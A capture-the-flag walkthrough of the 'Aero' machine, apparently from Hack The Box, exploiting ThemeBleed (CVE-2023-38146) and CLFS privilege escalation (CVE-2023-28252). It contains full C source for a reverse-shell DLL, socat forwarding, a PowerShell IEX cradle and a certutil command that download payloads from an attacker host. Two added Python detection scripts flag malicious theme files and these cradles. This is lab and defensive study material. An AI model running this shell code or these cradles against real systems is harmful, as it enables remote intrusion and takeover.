Aero

Port scan

$ sudo nmap 10.10.11.237 -p- --min-rate=10000 -T4 -sCV

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
|_http-title: Aero Theme Hub
|_http-server-header: Microsoft-IIS/10.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Web app

We can upload *.theme and *.themepack files to the website.

$ feroxbuster -u http://10.10.11.237/ -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-small.txt --threads=50 -k -C 404

Nothing interesting turned up.

A file with the THEMEPACK file extension is a Windows theme pack file. They're created by Windows 7 to apply similarly themed desktop backgrounds, window colors, sounds, icons, cursors, and screensavers.

A .theme file is a .ini text file that is divided into sections, which specify visual elements that appear on a Windows desktop.

ThemeBleed RCE

A Google search for "windows theme exploit" turns up an RCE exploit.

Background

CVE-2023-38146, known as ThemeBleed, is a vulnerability in Windows Themes that allows remote code execution. It was patched in the September 2023 Patch Tuesday.

The vulnerability comes from how Windows handles the .msstyles file referenced from within the theme file. When a .msstyles file is loaded, Windows also opens a DLL at the same path as the .msstyles file with _vrf.dll appended. The digital signature on this DLL is checked before it is loaded.

The vulnerability arises because, when version 999 is used, there is a large gap between the time the _vrf.dll binary's signature is checked and the time it is loaded for use. This gap is a race condition: an attacker who controls the share can replace the verified style DLL with a malicious payload in that window and run arbitrary code.
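The mechanism above points at a defender-side check that can run on a theme before it is applied, or in an upload or mail filter: parse the .theme INI, flag a [VisualStyles] Path that points at a remote share or outside the stock themes directory, and show the _vrf.dll path Windows would derive from it. This is an added example, not code from the writeup or from either PoC repository; the [VisualStyles]/Path layout is the standard Windows .theme structure, and the sample theme contents are constructed for the example.

```python
"""Scan Windows .theme files for ThemeBleed-style indicators (CVE-2023-38146).

Added example, not code from the writeup or the PoC repos. A .theme file is
an INI file; the [VisualStyles] section's Path= key names the .msstyles file
Windows loads, and the verifier DLL is looked up at that same path with
_vrf.dll appended. A Path pointing at an attacker-controlled SMB share is the
delivery vehicle for the race, so remote (UNC) or non-standard .msstyles
references are worth flagging before the theme is applied.
"""
import configparser
import re
import sys
from typing import List, Optional, Tuple

# UNC path: \\host\share\...
UNC_RE = re.compile(r"^\\\\[^\\]+\\")
# Where a stock Windows install keeps its .msstyles files (assumption: tune per fleet).
SYSTEM_THEMES_PREFIX = "%systemroot%\\resources\\themes\\"

# Constructed sample: the stock Aero theme reference.
BENIGN_THEME = r"""[Theme]
DisplayName=Aero

[VisualStyles]
Path=%SystemRoot%\resources\Themes\Aero\Aero.msstyles
ColorStyle=NormalColor
Size=NormalSize
"""

# Constructed sample: .msstyles served from a remote share, as ThemeBleed requires.
SUSPICIOUS_THEME = r"""[Theme]
DisplayName=test

[VisualStyles]
Path=\\10.10.16.3\share\Aero.msstyles
ColorStyle=NormalColor
Size=NormalSize
"""


def visual_styles_path(theme_text: str) -> Optional[str]:
    """Return the [VisualStyles] Path= value, or None if the theme has none."""
    # interpolation=None: theme paths contain %SystemRoot%, which would break
    # configparser's default %-interpolation.
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(theme_text)
    section = next((s for s in cp.sections() if s.lower() == "visualstyles"), None)
    if section is None:
        return None
    path = cp.get(section, "path", fallback="").strip().strip('"')
    return path or None


def derived_verifier_dll(msstyles_path: str) -> str:
    """The verifier DLL path Windows derives: the .msstyles path with _vrf.dll appended."""
    return msstyles_path + "_vrf.dll"


def scan_theme(theme_text: str) -> List[Tuple[str, str]]:
    """Return (tag, detail) findings; an empty list means nothing suspicious."""
    findings: List[Tuple[str, str]] = []
    path = visual_styles_path(theme_text)
    if path is None:
        return findings
    if UNC_RE.match(path):
        findings.append(("unc_path", f"msstyles loaded from a remote share: {path}"))
    if not path.lower().startswith(SYSTEM_THEMES_PREFIX):
        findings.append(("non_system_path", f"msstyles outside the Windows themes directory: {path}"))
    if not path.lower().endswith(".msstyles"):
        findings.append(("not_msstyles", f"VisualStyles Path does not name a .msstyles file: {path}"))
    if findings:
        findings.append(("verifier_dll", f"verifier DLL that would be loaded: {derived_verifier_dll(path)}"))
    return findings


def read_theme_file(filename: str) -> str:
    """Read a .theme file; Windows writes these as UTF-16 with a BOM or as ANSI/UTF-8."""
    with open(filename, "rb") as fh:
        raw = fh.read()
    if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return raw.decode("utf-16")
    return raw.decode("utf-8-sig", errors="replace")


if __name__ == "__main__":
    sources = [read_theme_file(f) for f in sys.argv[1:]] or [BENIGN_THEME, SUSPICIOUS_THEME]
    for text in sources:
        for tag, detail in scan_theme(text) or [("ok", "no suspicious msstyles reference")]:
            print(f"{tag}: {detail}")
```

The unc_path finding is the high-confidence signal; non_system_path will also fire on legitimate third-party themes installed elsewhere, so adjust SYSTEM_THEMES_PREFIX to what your fleet actually ships before alerting on it. The scan covers only the theme file itself, not the version-999 exchange inside the .msstyles, which happens later when the style is loaded.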

Windows 11 ‘ThemeBleed’ RCE bug gets proof-of-concept exploit

themebleed | GitHub

C reverse shell

main.c

#include <winsock2.h>
#include <windows.h>
#include <io.h>
#include <process.h>
#include <sys/types.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

static int ReverseShell(const char *CLIENT_IP, int CLIENT_PORT) {
    /* Refuse to run with placeholder connection settings. */
    if (strcmp(CLIENT_IP, "0.0.0.0") == 0 || CLIENT_PORT == 0) {
        write(2, "[ERROR] CLIENT_IP and/or CLIENT_PORT not defined.\n", 50);
        return (1);
    }

    /* Initialise Winsock 2.2. */
    WSADATA wsaData;
    if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {
        write(2, "[ERROR] WSAStartup failed.\n", 27);
        return (1);
    }

    /* Connect back to the listener. */
    int port = CLIENT_PORT;
    struct sockaddr_in sa;
    SOCKET sockt = WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);
    sa.sin_addr.s_addr = inet_addr(CLIENT_IP);

    if (connect(sockt, (struct sockaddr *) &sa, sizeof(sa)) != 0) {
        write(2, "[ERROR] connect failed.\n", 24);
        return (1);
    }

    /* Spawn cmd.exe with stdin/stdout/stderr redirected to the socket. */
    STARTUPINFO sinfo;
    memset(&sinfo, 0, sizeof(sinfo));
    sinfo.cb = sizeof(sinfo);
    sinfo.dwFlags = (STARTF_USESTDHANDLES);
    sinfo.hStdInput = (HANDLE)sockt;
    sinfo.hStdOutput = (HANDLE)sockt;
    sinfo.hStdError = (HANDLE)sockt;
    PROCESS_INFORMATION pinfo;
    CreateProcessA(NULL, "cmd", NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, &sinfo, &pinfo);

    return (0);
}

/* Exported entry point; ReverseShell is static, so this is the DLL's only export
   (the pefile check below confirms it). */
void VerifyThemeVersion() {
    ReverseShell("10.10.16.3", 4444);
}

$ x86_64-w64-mingw32-gcc-win32 main.c -lws2_32 -shared -o VerifyThemeVersion.dll

$ python -m pefile exports VerifyThemeVersion.dll
0x2ab281578 b'VerifyThemeVersion' 1

Download ThemeBleed from this repo and unzip it. Put VerifyThemeVersion.dll in the data folder and change its name to stage_3, then run .\ThemeBleed.exe server.

Since ThemeBleed.exe runs on my Windows virtual machine but the reverse shell will come back to my Kali, I need to connect these two virtual machines.

Note: if the SMB Server service is running on the Windows box, you need to stop it first (Win+R -> services.msc -> Server -> right click -> Properties -> Disable -> Stop -> reboot the box).

Troubleshooting: I cannot ping my Win box from my Kali.

  1. Click on the Start Menu

  2. Go to Control Panel

  3. Open Windows Firewall

  4. Open Advanced Settings

  5. Select Inbound Rules in the left window pane. In the right window pane, scroll down to File and Printer Sharing (Echo Request - ICMPv4-In). You will see two of these listed: the first enables this rule for the domain profile, the second for the private/public profiles. Unless your PC is on a domain, select the second of these two rules.

  6. Right-click File and Printer Sharing (Echo Request - ICMPv4-In) Profile: Private, Public and select Enable Rule. You will now be able to ping your host from either of your virtual machines.

# On Windows
# make the test.theme file and transfer it to my Kali
> .\ThemeBleed.exe make_theme 10.10.16.3 test.theme
> .\ThemeBleed.exe server

# On Kali
# everything arriving on port 445 is forwarded to my Windows box
$ sudo socat TCP-LISTEN:445,fork,reuseaddr TCP:192.168.255.136:445

Then, upload test.theme to the website and get the reverse shell.

# check whether the DLL runs correctly
> rundll32 VerifyThemeVersion.dll,VerifyThemeVersion

I checked the DLL file; it ran correctly, and I got a reverse shell from my Win box. But it didn't work when I uploaded the theme file from my Kali. So I decided to use my Win box to pwn this target, but that still didn't work.

Finally, use this repo to get the reverse shell:

Jnnshschl/CVE-2023-38146

$ cp VerifyThemeVersion.dll ./CVE-2023-38146/tb/ 
$ cp VerifyThemeVersion.dll Aero.msstyles_vrf_evil.dll

$ python3 themebleed.py -r 10.10.16.3 --no-dll

I compared the .theme files created by these two different repos. They are the same. So the probable reason might be that socat didn't forward port 445 properly. But when I ran the exploit on Windows, it still didn't work, so it might be that the repo didn't work in my environment.

User sam.emerson

> $b64 = [Convert]::ToBase64String([IO.FILE]::ReadAllBytes("CVE-2023-28252_Summary.pdf"))

CVE-2023-28252_Summary.pdf describes the exploit, as its name suggests.

CVE-2023-28252 | GitHub

The .blf file format is handled by the vulnerable Common Log File System driver, CLFS.sys, which lives in the drivers folder within system32.

Customize the repo to download a PowerShell reverse shell and compile it in Visual Studio.

I used a base64-encoded reverse shell; you can also upload a .ps1 file to get the reverse shell.

powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.16.3/shell.ps1')

I can fix that by going into the project settings (right click on clfs_eop in the Solution Explorer and go to Properties); under Configuration Properties > Advanced, set "Character Set" to "Use Multi-Byte Character Set". Now "Rebuild Solution":

When building clfs_eop.exe, choose Release instead of Debug.

> certutil -f -urlcache http://10.10.16.3/clfs_eop.exe clfs_eop.exe
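Both stages of this box pull a second-stage payload onto the host with a living-off-the-land download: the PowerShell IEX/Net.WebClient cradle above and the certutil -urlcache fetch here. Command-line logging (Sysmon Event ID 1 or Security 4688 with command-line auditing enabled) is where these show up. The following is an added example, not part of the original writeup: a small rule set run over constructed command lines, including a base64 -EncodedCommand variant that it decodes and re-scans. The rule names and sample lines are assumptions made for the example.

```python
"""Flag the download cradles this writeup uses in process command-line logs.

Added example, not part of the original writeup. It scans constructed
command lines (the CommandLine field a Sysmon or Security 4688 collector
would emit) for:
  * certutil -urlcache fetching an http(s) URL,
  * a PowerShell cradle that downloads a script and runs it with IEX,
  * a PowerShell -EncodedCommand blob, which is decoded (base64 of UTF-16LE)
    and re-scanned so an encoded cradle is caught as well.
"""
import base64
import re
from typing import Dict, List

# certutil used as a downloader: "-urlcache" plus a URL on the same line.
CERTUTIL_DOWNLOAD = re.compile(r"\bcertutil(?:\.exe)?\b.*-urlcache\b.*https?://", re.I)
# Execution primitive and fetch primitive; a cradle needs both.
CRADLE_EXEC = re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I)
CRADLE_FETCH = re.compile(r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", re.I)
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_COMMAND = re.compile(r"(?:^|\s)[-/](?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(blob: str) -> str:
    """Decode a PowerShell -EncodedCommand argument; returns '' if it is not valid."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def _scan_plain(text: str) -> List[str]:
    """Rules that apply to readable (non-encoded) command text."""
    hits = []
    if CERTUTIL_DOWNLOAD.search(text):
        hits.append("certutil_urlcache_download")
    if CRADLE_EXEC.search(text) and CRADLE_FETCH.search(text):
        hits.append("powershell_download_cradle")
    return hits


def detect(cmdline: str) -> List[str]:
    """Return the rule names that fire on one command line."""
    match = ENCODED_COMMAND.search(cmdline)
    # Scan the visible text with the base64 blob cut out, so '+' and '/' inside
    # the blob cannot create accidental word-boundary matches.
    visible = cmdline if match is None else cmdline[:match.start(1)] + cmdline[match.end(1):]
    hits = _scan_plain(visible)
    if match is not None:
        hits.append("powershell_encoded_command")
        # Re-scan the decoded script so encoding does not hide the cradle.
        hits.extend(h + "_in_encoded" for h in _scan_plain(decode_encoded_command(match.group(1))))
    return hits


def scan_log(lines: List[str]) -> Dict[str, List[str]]:
    """Map each command line that fired at least one rule to its rule names."""
    results: Dict[str, List[str]] = {}
    for line in lines:
        hits = detect(line)
        if hits:
            results[line] = hits
    return results


def encode_powershell(script: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample command lines: one benign, the two from the writeup, and an encoded cradle.
CRADLE = "IEX(New-Object Net.WebClient).downloadString('http://10.10.16.3/shell.ps1')"
SAMPLE_COMMAND_LINES = [
    r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    "certutil -f -urlcache http://10.10.16.3/clfs_eop.exe clfs_eop.exe",
    "powershell " + CRADLE,
    "powershell -enc " + encode_powershell(CRADLE),
]

if __name__ == "__main__":
    for line, hits in scan_log(SAMPLE_COMMAND_LINES).items():
        print(", ".join(hits), "<-", line[:80])
```

The certutil rule keys on -urlcache together with a URL rather than on certutil alone, since the binary is also used legitimately for certificate work; likewise the cradle rule requires both an execution primitive and a fetch primitive on the same line, which keeps plain `Invoke-WebRequest` downloads from firing it.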
